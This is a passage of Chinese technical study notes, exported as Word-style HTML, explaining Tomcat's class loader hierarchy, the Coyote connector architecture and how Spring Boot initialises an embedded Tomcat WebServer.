</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public boolean getDelegate();</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public void setDelegate(boolean delegate);</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>载入器的实现会指明是否要委托给父类的载入器，可以通过setDelegate()和getDelegate方法配置。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public void addPropertyChangeListener(PropertyChangeListener listener);</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public boolean modified();</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>在载入器的具体实现中，如果仓库中的一个或者多个类被修改了，那么modified()方法必须放回true，才能提供自动重载的支持。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>WebappLoader类支持自动重载功能。如果WEB-INF/classes目录或者WEB-INF/lib目录下的某些类被重新编译了，那么这个类会自动重新载入，而无需重启Tomcat。为了实现此目的，WebappLoader类使用一个线程周期性的检查每个资源的时间戳。间隔时间由变量checkInterval指定，单位为s，默认情况下，checkInterval的值为15s</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public void removePropertyChangeListener(PropertyChangeListener listener);</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="">}</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">除了加载</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;font-weight:bold;">web应用</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">默认使用的WebappLoader类加载器，还有其他几种加载器</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;"></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">Common类加载器，Cataline类加载器和Shared类加载器会在Tomcat容器启动的时候就初始化完成，</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">Webapp类加载器则是在Context容器启动时候有WebappLoader初始化</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">程上下文类加载器线程上下文类加载器是指的当前线程所用的类加载器，可以通过Thread.currentThread().getContextClassLoader()获得或者设置。在spring中，他会选择线程上下文类加载器去加载web应用底下的类，如此就打破了双亲委托机制</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">找到web.xml中的url-pattern->servlet-name->servlet-class->class extends HttpServlet</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="">，如果十个web应用都引入了spring的类，由于web类加载器的隔离，那么对内存的开销是很大的。此时我们可以想到shared类加载器，我们肯定都会选择将spring的jar放于shared目录底下，但是此时又会存在一个问题，shared类加载器是webapp类加载器的parent，若spring中的getBean方法需要加载web应用底下的类，这种过程是违反双亲委托机制的</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Calibri;">tomcat连接器</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;"></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Service组件包含两种组件：连接器和Servlet容器</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">每个连接器组件Connector都可以指定一个Servlet容器处理其解析得到的Request和Response，所以Service的功能比较简单，就是为Service中的每个组件设置Servlet容器</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">每个连接器组件Connector都可以指定一个Servlet容器处理其解析得到的Request和Response，所以Service的功能比较简单，就是为Service中的每个组件设置Servlet容器</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Tomcat中就是通过连接器Connector来管理Socket连接、解析Scoket请求为Request并封装响应数据为Response对象</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Coyote作为独立的模块，只负责具体协议和I/O的处理，与Servlet规范实现没有直接关系，因此即便是Request和Response对象也并未实现Servlet规范对应的接口，而是在Catalina中将他们进一步封装为ServletRequest何ServletResponse。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Coyote是Tomcat链接器框架的名称，是Tomcat服务器提供的供客户端访问的外部接口。客户端通过Coyote与服务器建立链接、发送请求并且接收响应</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Coyote封装了底层的网络通信（Socket请求以及响应处理），为Catalina容器提供了统一的接口，是Catalina容器与具体的请求协议以及 I/O方式解耦。Coyote将Socket输入转换为Request对象，交由Catalina容器进行处理，处理请求完成之后，Catalina通过Coyote提供的Response对象将结果写入输出流。</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Coyote框架支持HTTP/1.1协议、AJP协议、HTTP/2.0协议</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">针对HTTP和AJP协议，Coyote又按照 I/O方式分别提供了不同的选择方案</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">NIO：采用Java NIO类库实现。（默认）</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">NIO2：采用JDK 7最新的NIO2类库实现。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">APR：采用APR（Apache可移植运行库）实现</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;font-weight:bold;">这张图可能是我理解有问题，我并没有看出来任何不同协议的解析方式的区别在这张图上有体现</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">在Connector中有如下几个核心概念：</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Endpoint：Coyote通信端点，即通信监听的接口，是具体的Socker接收处理类，是对传输层的抽象。Tomcat并没有Endpoint接口，而是提供了一个抽象类AvstractEndpoint。根据I/O方式的不同，提供了NioEndpoint（NIO）、AprEndpoint（APR）以及Nio2Endpoint（NIO2）三个实现。</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;"> </span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="">这里要注意，NioEndpoint这个后面做tomcat回显时候可以用到</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">Processor：Coyote协议处理接口，负责构造Request和Response对象，并且通过Adapter将其提交到Catalina容器处理，是对应用层的抽象。Processor是单线程的</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat连接器;"><span style="font-family:Cambria;">UpgradeProtocol：Tomcat采用UpgradeProtocol接口表示HTTP升级协议，当前只提供了一个实现（Http2Protocol）用于处理HTTP/2.0。Tomcat中的WebSocket也是通过UpgradeToken机制实现的</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Calibri;">spring+tomcat</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">Spring容器在容器启动的时候，会调用</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="">WebApplicationType.deduceFromClasspath()</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">方法来推断当前的应用程序类型,当我们在项目中添加了</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="">spring-boot-starter-web</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">的依赖之后，项目路径中会包含webMvc的类，对应的Spring应用也会被识别为Web应用</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">Spring可以判断出当前应用的类型，之后Spring就需要根据应用类型去创建对应的ApplicationContext</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">对于我们关注的普通web应用，Spring会创建一个</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="">AnnotationConfigServletWebServerApplicationContext</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">。容器中必定包含了servlet容器的初始化</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 创建Tomcat容器的WebServer</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">webServer</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> factory</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getWebServer</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSelfInitializer</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">());</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">在Spring容器启动的时候会初始化WebServer，也就是初始化Tomcat容器</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">初始化Tomcat容器的过程中，第一步是获取创建Tomcat WebServer的工厂类TomcatServletWebServerFactory，分析源码可知，Spring是直接通过Bean的类型从Spring容器中获取ServletWebServerFactory的，所以Tomcat容器类型的SpringBoot应该在启动时向容器中注册TomcatServletWebServerFactory的实例作为一个Bean</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">拿到用于创建WebServer的ServletWebServerFactory，我们就可以开始着手创建WebServer了</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">创建WebServer的第一步是拿到创建时需要的参数，这个参数的类型是ServletContextInitializer，ServletContextInitializer的作用是用于初始化ServletContext，接口源码如下，从接口的注释中我们就可以看到，这个参数可以用于配置servlet容器的filters，listeners等信息</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">Spring是通过getSelfInitializer()方法来获取初始化参数，查看getSelfInitializer()方法，可以发现该方法实现了如下功能：</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">绑定SpringBoot应用程序和ServletContext；</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">向SpringBoot注册ServletContext，Socpe为Application级别；</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">向SpringBoot上下文环境注册ServletContext环境相关的Bean；</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">4.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">获取容器中所有的ServletContextInitializer，依次处理ServletContext</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">获取到用于创建WebServer的参数之后，Spring就会调用工厂方法去创建Tomcat对应的WebServer</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">从下面初始化Web容器的代码可以看到，Spring容器会注册两个和WebServer容器相关的生命周期Bean：</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">容器的优雅关闭Bea——webServerGracefulShutdown。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">容器的生命周期管理的Bean——webServerStartStop</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: 